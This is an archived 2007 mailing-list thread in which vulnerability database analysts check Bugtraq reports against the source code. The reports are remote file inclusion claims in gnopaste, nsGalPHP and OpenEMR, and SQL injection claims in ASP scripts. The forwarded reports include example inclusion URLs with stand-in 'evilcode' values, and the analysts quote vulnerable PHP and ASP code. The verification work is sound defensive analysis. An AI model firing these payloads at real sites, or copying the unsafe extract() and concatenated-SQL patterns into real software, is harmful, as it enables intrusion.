(http://http://www.oemr.org/) -- Michael "carstein" Melewski | "We have no future bacause our present carstein()7thguard.net | is too volatile. We have only risk mobile: 512 357 303 | management. The spinning of the given JID: carstein()gentoo.pl | moment's scenarios. Pattern recognition. --- end forwarded message --- From rkeith at securityfocus.com Mon Jan 29 13:10:37 2007 From: rkeith at securityfocus.com (rkeith at securityfocus.com) Date: Mon, 29 Jan 2007 11:10:37 -0700 (MST) Subject: [VIM] [Bogus] [trzindan@hotmail.fr: gnopaste <= 0.5.3 (index.php) Remote File Include Vulnerability] (fwd) Message-ID: The PoC shown should tell the tale. The parameter isn't even a variable. This is at least the third issue recently from this reporter that is fake. -- Rob Keith Symantec ----- Forwarded message from trzindan at hotmail.fr ----- From: trzindan at hotmail.fr Subject: gnopaste <= 0.5.3 (index.php) Remote File Include Vulnerability To: bugtraq at securityfocus.com Date: 29 Jan 2007 16:24:48 -0000 X-Mailer: MIME-tools 5.411 (Entity 5.404) Message-ID: <20070129162448.22427.qmail at securityfocus.com> ################ t3K t4b4nc4 ################# # # gnopaste <= 0.5.3 (index.php) Remote File Include Vulnerability # Script site: http://sourceforge.net/projects/gnopaste # Find by Tr_ZiNDaN # Greetings; EL_MuHaMMeD,CyberWolf,Crackers_Child,EntriKa,Xyu,Sehzade, B4ct3ry,M3rhametsiz,Cold Z3ro,e-system,blackwolf,Paradox_ # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # T3K T4B4NC4 # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Contact: trzindan at hotmail.fr # ################################################################## file: index.php include(GNP_REAL_PATH . 'includes/common.php'); exp: http://yourdomain.com/gnopaste-0.5.4/index.php?GNP_REAL_PATH=evildode? ################################################################## ----- End forwarded message ----- From sn0opy.team at gmail.com Mon Jan 29 18:19:37 2007 From: sn0opy.team at gmail.com (sn0oPy da master) Date: Mon, 29 Jan 2007 23:19:37 +0000 Subject: [VIM] a-forum xss - who? what? where? Message-ID: <843b3bf90701291519s43275c7ege8bc91317ce336e5@mail.gmail.com> the a-forum script was devlopped by Arnaud Guyonne who is a devlopper from the ex phplive, because the phplive.com not exist now, i've remplaced it by the web site of the creator. http://www.mistersp.com that's all fraternellement sn0oPy du Maroc -------------- next part -------------- An HTML attachment was scrubbed... URL: http://www.attrition.org/pipermail/vim/attachments/20070129/03603f00/attachment.html From coley at mitre.org Tue Jan 30 10:53:31 2007 From: coley at mitre.org (Steven M. Christey) Date: Tue, 30 Jan 2007 10:53:31 -0500 (EST) Subject: [VIM] Source VERIFY: nsGalPHP RFI Message-ID: <200701301553.l0UFrVWc007286@faron.mitre.org> Researcher: S.W.A.T. Ref: http://milw0rm.com/exploits/3205 The code extract is as appears. includes/config.inc.php has: include_once($racineTBS.'includes/tbs_class.php'); with no prior includes or definitions of $racineTBS. Of note is that the researcher was not fooled by the main files, such as connexion.php and index.php, which have: $racineTBS = ''; require_once($racineTBS.'includes/config.inc.php'); and thus don't have RFI. This is a good demonstration of a realization that I recently had - PHP application developers don't expect that their library files will be directly called, and this is probably the main source of RFI's. - Steve From heinbockel at mitre.org Wed Jan 31 14:29:39 2007 From: heinbockel at mitre.org (Heinbockel, Bill) Date: Wed, 31 Jan 2007 14:29:39 -0500 Subject: [VIM] VERIFY of RFI and XSS in OpenEMR 2.8.2 (was [still bogus] V [mike@carstein.kill-9.pl: Re: Open Conference Systems = 2.8.2 Remote File Inclusion]) In-Reply-To: References: Message-ID: <224FBC6B814DBD4E9B9E293BE33A10DC018CEE7D@IMCSRV5.MITRE.ORG> No, this is not the case. The report is perfectly valid as shown through later Bugtraq discussions. This post is for VIM accuracy and completeness, as well as to demonstrate the problems with post-disclosure analysis. Problem 1 (researcher): The researcher claims that there is a RFI in import_xml.php in Open Conference Systems (ocs). A look at the example RFI shows that the problem is actually within OpenEMR 2.8.2: http://localhost/ocs/openemr-2.8.2/custom/import_xml.php?srcdir=evilcod e Problem 2 (post-disclosure analyst): Looking at custom/import_xml.php in OpenEMR 2.8.2 (lines 13-15): > include_once("../interface/globals.php"); > include_once("$srcdir/patient.inc"); > include_once("$srcdir/acl.inc"); Now tracing back into interface/globals.php: > $GLOBALS['srcdir'] = "$webserver_root/library"; // line 24 > ... > $srcdir = $GLOBALS['srcdir']; // line 119 ** So at this point we have an apparent dispute.** However, continuing further into interface/globals.php (lines 240-245): > // required for normal operation because of recent changes in PHP: > $ps = strpos($_SERVER['REQUEST_URI'],"myadmin"); > if ($ps === false) { > extract($_GET); > extract($_POST); > } ** WHOOPS. The vendor did do the right thing, until those two little extract statements were slipped in for "normal operation".** =================================================================== Additionally, in followup Bugtraq discussions. There is a XSS in the rootdir parameter in interface/login/login_frame.php. This is also confirmed and stems from the same variable overwrite issue that caused the above RFI. http://www.securityfocus.com/archive/1/458465/100/0/threaded http://www.securityfocus.com/archive/1/458476/100/0/threaded William Heinbockel Infosec Engineer The MITRE Corporation 202 Burlington Rd. MS S145 Bedford, MA 01730 heinbockel at mitre.org 781-271-2615 >-----Original Message----- >From: vim-bounces at attrition.org >[mailto:vim-bounces at attrition.org] On Behalf Of >rkeith at securityfocus.com >Sent: Montag, 29. Januar 2007 12:28 >To: Vulnerability Information Managers >Subject: [VIM] [still bogus] V [mike at carstein.kill-9.pl: Re: >Open Conference Systems = 2.8.2 Remote File Inclusion] (fwd) > > >This report came up on the weekend and had some conflicting >data. The version >was wrong for the software specified, and the scipt didnt >exist. This new >report points to the correct software. However, the report is >still bogus >as a configruation file (globals.php) called at the beginning of the >script clearly defines the specified vulnerable parameter. > >-- >Rob Keith >Symantec > > >----- Forwarded message from Micha? Melewski > ----- > >From: =?UTF-8?Q?Micha=C5=82?= Melewski >Subject: Re: Open Conference Systems = 2.8.2 Remote File Inclusion >To: trzindan at hotmail.com >Cc: bugtraq at securityfocus.com >Date: Sat, 27 Jan 2007 21:55:56 +0100 >X-Mailer: Evolution 2.8.2.1 >Message-Id: <1169931357.8362.3.camel at localhost> > >Dnia 27-01-2007, sob o godzinie 12:52 +0000, trzindan at hotmail.com >napisa?(a): >> >############################################################### >########## >> # Open Conference Systems <= 2.8.2 Remote File Inclusion >> # Download Source : http://pkp.sfu.ca/ocs/download/ocs-1.1.3.tar.gz > >> # >> # Found By : Tr_ZiNDaN >> # Location : TurkeY -- #trzindan at hotmail.fr >> >############################################################### >######### >This bug has nothing to do with Open Conference System. This >is a bug in >OpenEMR (http://http://www.oemr.org/) > > >-- >Michael "carstein" Melewski | "We have no future bacause our present >carstein()7thguard.net | is too volatile. We have only risk >mobile: 512 357 303 | management. The spinning of the given >JID: carstein()gentoo.pl | moment's scenarios. Pattern >recognition. > >--- end forwarded message --- > From coley at mitre.org Wed Jan 31 14:44:54 2007 From: coley at mitre.org (Steven M. Christey) Date: Wed, 31 Jan 2007 14:44:54 -0500 (EST) Subject: [VIM] Partial source code verify - "RBL - ASP" scripts SQL injection Message-ID: <200701311944.l0VJisUm002180@faron.mitre.org> Researcher: sn0oPy Ref: BUGTRAQ RBL - ASP (scripts with db) SQL injection http://www.securityfocus.com/archive/1/archive/1/458560/100/0/threaded The referenced vendor site was casually examined to try to infer actual product names. tUrl was examined, but egrep "user|pass" yielded nothing. tForum's user_confirm.asp has: >uId = Request("id") > >sql = "select A.* from x_User A Where A.idUser =" & uId & " AND A.sPassword = '" & Request("_pass") & "'" tpassword's login.asp has: > iStatus = Check_Login(Request.Form("User"),Request.Form("Password")) > >... >Function Check_Login(sUser, sPass) > Dim rs, sql > > sql = "SELECT * FROM tUser WHERE sCode ='" & sUser & "' AND sPassword='" & sPass & "' " So looks like at least these two are legit. I didn't look at the other products. - Steve From coley at linus.mitre.org Wed Jan 31 15:03:39 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Wed, 31 Jan 2007 15:03:39 -0500 (EST) Subject: [VIM] VERIFY of RFI and XSS in OpenEMR 2.8.2 (was [still bogus] V [mike@carstein.kill-9.pl: Re: Open Conference Systems = 2.8.2 Remote File Inclusion]) In-Reply-To: <224FBC6B814DBD4E9B9E293BE33A10DC018CEE7D@IMCSRV5.MITRE.ORG> References: <224FBC6B814DBD4E9B9E293BE33A10DC018CEE7D@IMCSRV5.MITRE.ORG> Message-ID: On Wed, 31 Jan 2007, Heinbockel, Bill wrote: > > if ($ps === false) { > > extract($_GET); > > extract($_POST); > > } > > ** WHOOPS. The vendor did do the right thing, until those two little > extract statements > were slipped in for "normal operation".** Great find, Bill. Reminds me of why I love to hate PHP. - Steve